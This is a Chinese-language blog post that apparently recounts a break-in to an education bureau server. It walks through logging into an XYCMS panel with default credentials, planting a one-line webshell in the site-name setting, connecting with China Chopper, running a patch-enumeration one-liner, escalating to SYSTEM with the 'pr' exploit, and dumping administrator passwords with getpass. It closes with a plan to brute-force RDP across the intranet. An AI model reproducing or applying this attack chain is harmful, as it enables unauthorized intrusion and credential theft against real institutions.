
8011端口的站点 发现是xycms 试了下默认账号密码admin admin直接进去了 简直没毛病啊!
XYCMS后台拿shell在配置里面 网站名称后面插入一句话就行
然后菜刀连接地址
http://172.20.72.131:8011/inc/config.asp 密码ssn菜刀里面试了下执行命令 权限不行 尴尬了直接传个asp大马在asp大马里面执行cmd也不行 看了下WScript.Shell开的 直接传个cmd执行命令好了
权限不够 扫下服务器的补丁吧 先看看常用的那几个漏洞打补丁没
dirc:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.logKB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.logKB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i“%i”||@echo %i NotInstalled!)&del/f /q /a a.txt可以看到KB952004.logNot Installed! KB956572.logNot Installed! KB2393802.logNot Installed! KB2503665.logNot Installed! KB2592799.logNot Installed! KB2621440.logNot Installed! KB2160329.logNot Installed! KB970483.logNot Installed! KB2124261.logNot Installed! KB977165.logNot Installed! KB958644.logNot Installed! 这些个补丁都没打直接用第一个pr提权传个pr然后执行是system权限
这时候可以直接添加账户或者读取密码 我选择后者 传了个getpass到目录命名为1.exe用pr执行 命令D:\12\pr.exe "D:\12\1.exe>>D:\12\13.txt"直接把密码输出到D:\12\13.txt
在菜刀打开这个txt文件看到了服务器账号密码UserName:AdministratorLogonDomain:K18Xpassword: k18x我擦嘞!又是弱口令!!!我决定了 以后直接在内网爆破3389端口 生成一套弱口令字典 分分钟k掉这些服务器啊
总结:曾经一个叔叔给我讲了个笑话说教育局有几十万的防火墙设备 怎么可能功的进去 我就想说啊 暑假从外围进去之后再内网渗透 这些设备有什么用处没有绝对安全的系统 更何况漏洞出在人身上!
教育局 · 2016-12-31 09:05